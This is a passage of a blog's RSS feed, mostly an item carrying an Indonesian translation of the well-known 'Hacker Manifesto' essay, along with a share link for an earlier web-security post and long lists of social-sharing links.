			<a href="http://compose.mail.yahoo.com/?Subject=Web+Security+Yin-Yang+%28Attacking+%26+Defending%29&amp;body=Link: http://www.james0baster.web.id/v2/web-security-yin-yang-attacking-defending/ (sent via shareaholic)%0D%0A%0D%0A----%0D%0A %0D%0AWEB%20SECURITY%20YIN-YANG%0D%0ADitulis%20oleh%3A%20gentoo%2C%20foobar4joo%40gmail.com%0D%0A%22If%20you%20know%20both%20yourself%20and%20your%20enemy%2C%20you%20can%20win%20a%20hundred%20battles%20without%20a%20single%20loss.%22%0D%0ADi%20berbagai%20segi%20kehidupan%2C%20sangatlah%20di%20butuhkan%20keseimbangan.%20Bahkan%20yang%20sangat%20terkenal%20adalah%20sebuah%20ungkapan%20dari%20Sun%20Tzu%20yang%20" rel="nofollow" class="external" title="Email this via Yahoo! Mail">Email this via Yahoo! Mail</a>
		</li>
</ul>
<div style="clear:both;"></div>
</div>

<a class="wpptopdf" target="_blank" rel="noindex,nofollow" href="http://www.james0baster.web.id/v2/web-security-yin-yang-attacking-defending/?format=pdf" title="Download PDF">http://www.james0baster.web.id/v2/wp-content/plugins/wp-post-to-pdf/asset/images/pdf.png</a>]]></content:encoded>
			<wfw:commentRss>http://www.james0baster.web.id/v2/web-security-yin-yang-attacking-defending/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Manifesto Seorang Hacker</title>
		<link>http://www.james0baster.web.id/v2/manifesto-seorang-hacker/</link>
		<comments>http://www.james0baster.web.id/v2/manifesto-seorang-hacker/#comments</comments>
		<pubDate>Tue, 09 Feb 2010 08:55:08 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[..::james0baster::..]]></category>
		<category><![CDATA[Berita dan Pengumuman]]></category>
		<category><![CDATA[Hacking]]></category>

		<guid isPermaLink="false">http://www.james0baster.web.id/v2/?p=80</guid>
		<description><![CDATA[<p><a href="http://www.james0baster.web.id/v2/wp-content/uploads/2010/02/not_the_linux_file_system.jpg"><img class="size-full wp-image-48 alignleft" title="not_the_linux_file_system" src="http://www.james0baster.web.id/v2/wp-content/uploads/2010/02/not_the_linux_file_system.jpg" alt="" width="343" height="256" /></a>Ini adalah dunia kami sekarang, dunianya electron dan switch, keindahan sebuah baut.</p>
<p>Kami mendayagunakan sebuah system yang telah ada tanpa membayar, yang bisa jadi biaya tersebut sangatlah murah jika tidak dijalankan dengan nafsu tamak mencari keuntungan, dan kalian sebut kami criminal.<span id="more-80"></span><br />
Kami menjelajah, dan kalian sebut kami criminal.<br />
Kami mengejar pengetahuan, dan kalian sebut kami criminal.<br />
Kami hadir tanpa perbedaan warna kulit, kebangsaan ataupun prasangka keagamaan, dan kalian sebut kami criminal.<br />
Kalian membuat bom atom, kalian menggelar peperangan, kalian membunuh, kalian berlaku curang, membohongi kami dan mencoba meyakinkan kami bahwa semua itu demi kebaikan kami, tetap saja kami yang disebut criminal.<br />
Ya, aku memang seorang criminal.<br />
Kejahatanku adalah rasa keingintahuanku.<br />
Kejahatanku adalah karena menilai orang lain dari apa yang mereka katakana dan pikirkan, bukan pada penampilan mereka.<br />
Kejahatanku adalah menjadi lebih pintar dari kalian, sesuatu yang tak akan kalian maafkan.<br />
Aku memang seorang hacker, dan inilah manifesto saya.<br />
Kalian bisa saja menghentikanku, tetapi kalian tak mungkin menghentikan kami semua.<br />
Bagaimanapun juga, kami semua senasib seperjuangan.</p>
<p class="facebook"><a href="http://www.facebook.com/share.php?u=http://www.james0baster.web.id/v2/manifesto-seorang-hacker/" target="_blank" title="Share on Facebook">Share on Facebook</a></p>



		
			Blog this on Blogger
		
		
			Subscribe to the comments for this post?
		
		
			Share this on del.icio.us
		
		
			Digg this!
		
		
			Post this on Diigo
		
		
			Share this on Facebook
		
		
			Email this via Gmail
		
		
			Add this to Google Bookmarks
		
		
			Post on Google Buzz
		
		
			Add this to Google Reader
		
		
			Submit this to Hacker News
		
		
			Email this via Hotmail
		
		
			Email this to a friend?
		
		
			Add this to Mister Wong
		
		
			Share this on Mixx
		
		
			Post this to MySpace
		
		
			Share [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.james0baster.web.id/v2/wp-content/uploads/2010/02/not_the_linux_file_system.jpg"><img class="size-full wp-image-48 alignleft" title="not_the_linux_file_system" src="http://www.james0baster.web.id/v2/wp-content/uploads/2010/02/not_the_linux_file_system.jpg" alt="" width="343" height="256" /></a>Ini adalah dunia kami sekarang, dunianya electron dan switch, keindahan sebuah baut.</p>
<p>Kami mendayagunakan sebuah system yang telah ada tanpa membayar, yang bisa jadi biaya tersebut sangatlah murah jika tidak dijalankan dengan nafsu tamak mencari keuntungan, dan kalian sebut kami criminal.<span id="more-80"></span><br />
Kami menjelajah, dan kalian sebut kami criminal.<br />
Kami mengejar pengetahuan, dan kalian sebut kami criminal.<br />
Kami hadir tanpa perbedaan warna kulit, kebangsaan ataupun prasangka keagamaan, dan kalian sebut kami criminal.<br />
Kalian membuat bom atom, kalian menggelar peperangan, kalian membunuh, kalian berlaku curang, membohongi kami dan mencoba meyakinkan kami bahwa semua itu demi kebaikan kami, tetap saja kami yang disebut criminal.<br />
Ya, aku memang seorang criminal.<br />
Kejahatanku adalah rasa keingintahuanku.<br />
Kejahatanku adalah karena menilai orang lain dari apa yang mereka katakana dan pikirkan, bukan pada penampilan mereka.<br />
Kejahatanku adalah menjadi lebih pintar dari kalian, sesuatu yang tak akan kalian maafkan.<br />
Aku memang seorang hacker, dan inilah manifesto saya.<br />
Kalian bisa saja menghentikanku, tetapi kalian tak mungkin menghentikan kami semua.<br />
Bagaimanapun juga, kami semua senasib seperjuangan.</p>
<p class="facebook"><a href="http://www.facebook.com/share.php?u=http://www.james0baster.web.id/v2/manifesto-seorang-hacker/" target="_blank" title="Share on Facebook">Share on Facebook</a></p>

<div class="shr-bookmarks shr-bookmarks-expand shr-bookmarks-center shr-bookmarks-bg-caring-old">
<ul class="socials">
		<li class="shr-blogger">
			<a href="http://www.blogger.com/blog_this.pyra?t&amp;u=http://www.james0baster.web.id/v2/manifesto-seorang-hacker/&amp;n=Manifesto+Seorang+Hacker&amp;pli=1" rel="nofollow" class="external" title="Blog this on Blogger">Blog this on Blogger</a>
		</li>
		<li class="shr-comfeed">
			<a href="http://www.james0baster.web.id/v2/manifesto-seorang-hacker/feed" rel="nofollow" class="external" title="Subscribe to the comments for this post?">Subscribe to the comments for this post?</a>
		</li>
		<li class="shr-delicious">
			<a href="http://delicious.com/post?url=http://www.james0baster.web.id/v2/manifesto-seorang-hacker/&amp;title=Manifesto+Seorang+Hacker" rel="nofollow" class="external" title="Share this on del.icio.us">Share this on del.icio.us</a>
		</li>
		<li class="shr-digg">
			<a href="http://digg.com/submit?phase=2&amp;url=http://www.james0baster.web.id/v2/manifesto-seorang-hacker/&amp;title=Manifesto+Seorang+Hacker" rel="nofollow" class="external" title="Digg this!">Digg this!</a>
		</li>
		<li class="shr-diigo">
			<a href="http://www.diigo.com/post?url=http://www.james0baster.web.id/v2/manifesto-seorang-hacker/&amp;title=Manifesto+Seorang+Hacker&amp;desc=Ini%20adalah%20dunia%20kami%20sekarang%2C%20dunianya%20electron%20dan%20switch%2C%20keindahan%20sebuah%20baut.%0D%0A%0D%0AKami%20mendayagunakan%20sebuah%20system%20yang%20telah%20ada%20tanpa%20membayar%2C%20yang%20bisa%20jadi%20biaya%20tersebut%20sangatlah%20murah%20jika%20tidak%20dijalankan%20dengan%20nafsu%20tamak%20mencari%20keuntungan%2C%20dan%20kalian%20sebut%20kami%20criminal.%0D%0AKami%20me" rel="nofollow" class="external" title="Post this on Diigo">Post this on Diigo</a>
		</li>
		<li class="shr-facebook">
			<a href="http://www.facebook.com/share.php?v=4&amp;src=bm&amp;u=http://www.james0baster.web.id/v2/manifesto-seorang-hacker/&amp;t=Manifesto+Seorang+Hacker" rel="nofollow" class="external" title="Share this on Facebook">Share this on Facebook</a>
		</li>
		<li class="shr-gmail">
			<a href="https://mail.google.com/mail/?ui=2&amp;view=cm&amp;fs=1&amp;tf=1&amp;su=Manifesto+Seorang+Hacker&amp;body=Link: http://www.james0baster.web.id/v2/manifesto-seorang-hacker/ (sent via shareaholic)%0D%0A%0D%0A----%0D%0A Ini%20adalah%20dunia%20kami%20sekarang%2C%20dunianya%20electron%20dan%20switch%2C%20keindahan%20sebuah%20baut.%0D%0A%0D%0AKami%20mendayagunakan%20sebuah%20system%20yang%20telah%20ada%20tanpa%20membayar%2C%20yang%20bisa%20jadi%20biaya%20tersebut%20sangatlah%20murah%20jika%20tidak%20dijalankan%20dengan%20nafsu%20tamak%20mencari%20keuntungan%2C%20dan%20kalian%20sebut%20kami%20criminal.%0D%0AKami%20me" rel="nofollow" class="external" title="Email this via Gmail">Email this via Gmail</a>
		</li>
		<li class="shr-googlebookmarks">
			<a href="http://www.google.com/bookmarks/mark?op=add&amp;bkmk=http://www.james0baster.web.id/v2/manifesto-seorang-hacker/&amp;title=Manifesto+Seorang+Hacker" rel="nofollow" class="external" title="Add this to Google Bookmarks">Add this to Google Bookmarks</a>
		</li>
		<li class="shr-googlebuzz">
			<a href="http://www.google.com/buzz/post?url=http://www.james0baster.web.id/v2/manifesto-seorang-hacker/&amp;imageurl=" rel="nofollow" class="external" title="Post on Google Buzz">Post on Google Buzz</a>
		</li>
		<li class="shr-googlereader">
			<a href="http://www.google.com/reader/link?url=http://www.james0baster.web.id/v2/manifesto-seorang-hacker/&amp;title=Manifesto+Seorang+Hacker&amp;srcUrl=http://www.james0baster.web.id/v2/manifesto-seorang-hacker/&amp;srcTitle=Manifesto+Seorang+Hacker&amp;snippet=Ini%20adalah%20dunia%20kami%20sekarang%2C%20dunianya%20electron%20dan%20switch%2C%20keindahan%20sebuah%20baut.%0D%0A%0D%0AKami%20mendayagunakan%20sebuah%20system%20yang%20telah%20ada%20tanpa%20membayar%2C%20yang%20bisa%20jadi%20biaya%20tersebut%20sangatlah%20murah%20jika%20tidak%20dijalankan%20dengan%20nafsu%20tamak%20mencari%20keuntungan%2C%20dan%20kalian%20sebut%20kami%20criminal.%0D%0AKami%20me" rel="nofollow" class="external" title="Add this to Google Reader">Add this to Google Reader</a>
		</li>
		<li class="shr-hackernews">
			<a href="http://news.ycombinator.com/submitlink?u=http://www.james0baster.web.id/v2/manifesto-seorang-hacker/&amp;t=Manifesto+Seorang+Hacker" rel="nofollow" class="external" title="Submit this to Hacker News">Submit this to Hacker News</a>
		</li>
		<li class="shr-hotmail">
			<a href="http://mail.live.com/?rru=compose?subject=Manifesto+Seorang+Hacker&amp;body=Link: http://www.james0baster.web.id/v2/manifesto-seorang-hacker/ (sent via shareaholic)%0D%0A%0D%0A----%0D%0A Ini%20adalah%20dunia%20kami%20sekarang%2C%20dunianya%20electron%20dan%20switch%2C%20keindahan%20sebuah%20baut.%0D%0A%0D%0AKami%20mendayagunakan%20sebuah%20system%20yang%20telah%20ada%20tanpa%20membayar%2C%20yang%20bisa%20jadi%20biaya%20tersebut%20sangatlah%20murah%20jika%20tidak%20dijalankan%20dengan%20nafsu%20tamak%20mencari%20keuntungan%2C%20dan%20kalian%20sebut%20kami%20criminal.%0D%0AKami%20me" rel="nofollow" class="external" title="Email this via Hotmail">Email this via Hotmail</a>
		</li>
		<li class="shr-mail">
			<a href="mailto:?subject=%22Manifesto%20Seorang%20Hacker%22&amp;body=Link: http://www.james0baster.web.id/v2/manifesto-seorang-hacker/ (sent via shareaholic)%0D%0A%0D%0A----%0D%0A Ini%20adalah%20dunia%20kami%20sekarang%2C%20dunianya%20electron%20dan%20switch%2C%20keindahan%20sebuah%20baut.%0D%0A%0D%0AKami%20mendayagunakan%20sebuah%20system%20yang%20telah%20ada%20tanpa%20membayar%2C%20yang%20bisa%20jadi%20biaya%20tersebut%20sangatlah%20murah%20jika%20tidak%20dijalankan%20dengan%20nafsu%20tamak%20mencari%20keuntungan%2C%20dan%20kalian%20sebut%20kami%20criminal.%0D%0AKami%20me" rel="nofollow" class="external" title="Email this to a friend?">Email this to a friend?</a>
		</li>
		<li class="shr-misterwong">
			<a href="http://www.mister-wong.com/addurl/?bm_url=http://www.james0baster.web.id/v2/manifesto-seorang-hacker/&amp;bm_description=Manifesto+Seorang+Hacker&amp;plugin=sexybookmarks" rel="nofollow" class="external" title="Add this to Mister Wong">Add this to Mister Wong</a>
		</li>
		<li class="shr-mixx">
			<a href="http://www.mixx.com/submit?page_url=http://www.james0baster.web.id/v2/manifesto-seorang-hacker/&amp;title=Manifesto+Seorang+Hacker" rel="nofollow" class="external" title="Share this on Mixx">Share this on Mixx</a>
		</li>
		<li class="shr-myspace">
			<a href="http://www.myspace.com/Modules/PostTo/Pages/?u=http://www.james0baster.web.id/v2/manifesto-seorang-hacker/&amp;t=Manifesto+Seorang+Hacker" rel="nofollow" class="external" title="Post this to MySpace">Post this to MySpace</a>
		</li>
		<li class="shr-plurk">
			<a href="http://www.plurk.com/m?content=Manifesto+Seorang+Hacker+-+http://www.james0baster.web.id/v2/manifesto-seorang-hacker/&amp;qualifier=shares" rel="nofollow" class="external" title="Share this on Plurk">Share this on Plurk</a>
		</li>
		<li class="shr-reddit">
			<a href="http://reddit.com/submit?url=http://www.james0baster.web.id/v2/manifesto-seorang-hacker/&amp;title=Manifesto+Seorang+Hacker" rel="nofollow" class="external" title="Share this on Reddit">Share this on Reddit</a>
		</li>
		<li class="shr-stumbleupon">
			<a href="http://www.stumbleupon.com/submit?url=http://www.james0baster.web.id/v2/manifesto-seorang-hacker/&amp;title=Manifesto+Seorang+Hacker" rel="nofollow" class="external" title="Stumble upon something good? Share it on StumbleUpon">Stumble upon something good? Share it on StumbleUpon</a>
		</li>
		<li class="shr-technorati">
			<a href="http://technorati.com/faves?add=http://www.james0baster.web.id/v2/manifesto-seorang-hacker/" rel="nofollow" class="external" title="Share this on Technorati">Share this on Technorati</a>
		</li>
		<li class="shr-twitter">
			<a href="http://twitter.com/home?status=Manifesto+Seorang+Hacker+-+http://bit.ly/icNEtb&amp;source=shareaholic" rel="nofollow" class="external" title="Tweet This!">Tweet This!</a>
		</li>
		<li class="shr-yahoobuzz">
			<a href="http://buzz.yahoo.com/submit/?submitUrl=http://www.james0baster.web.id/v2/manifesto-seorang-hacker/&amp;submitHeadline=Manifesto+Seorang+Hacker&amp;submitSummary=Ini%20adalah%20dunia%20kami%20sekarang%2C%20dunianya%20electron%20dan%20switch%2C%20keindahan%20sebuah%20baut.%0D%0A%0D%0AKami%20mendayagunakan%20sebuah%20system%20yang%20telah%20ada%20tanpa%20membayar%2C%20yang%20bisa%20jadi%20biaya%20tersebut%20sangatlah%20murah%20jika%20tidak%20dijalankan%20dengan%20nafsu%20tamak%20mencari%20keuntungan%2C%20dan%20kalian%20sebut%20kami%20criminal.%0D%0AKami%20me&amp;submitCategory=science&amp;submitAssetType=text" rel="nofollow" class="external" title="Buzz up!">Buzz up!</a>
		</li>
		<li class="shr-yahoomail">
			<a href="http://compose.mail.yahoo.com/?Subject=Manifesto+Seorang+Hacker&amp;body=Link: http://www.james0baster.web.id/v2/manifesto-seorang-hacker/ (sent via shareaholic)%0D%0A%0D%0A----%0D%0A Ini%20adalah%20dunia%20kami%20sekarang%2C%20dunianya%20electron%20dan%20switch%2C%20keindahan%20sebuah%20baut.%0D%0A%0D%0AKami%20mendayagunakan%20sebuah%20system%20yang%20telah%20ada%20tanpa%20membayar%2C%20yang%20bisa%20jadi%20biaya%20tersebut%20sangatlah%20murah%20jika%20tidak%20dijalankan%20dengan%20nafsu%20tamak%20mencari%20keuntungan%2C%20dan%20kalian%20sebut%20kami%20criminal.%0D%0AKami%20me" rel="nofollow" class="external" title="Email this via Yahoo! Mail">Email this via Yahoo! Mail</a>
		</li>
</ul>
<div style="clear:both;"></div>
</div>

<a class="wpptopdf" target="_blank" rel="noindex,nofollow" href="http://www.james0baster.web.id/v2/manifesto-seorang-hacker/?format=pdf" title="Download PDF">http://www.james0baster.web.id/v2/wp-content/plugins/wp-post-to-pdf/asset/images/pdf.png</a>]]></content:encoded>
			<wfw:commentRss>http://www.james0baster.web.id/v2/manifesto-seorang-hacker/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
	</channel>
</rss>

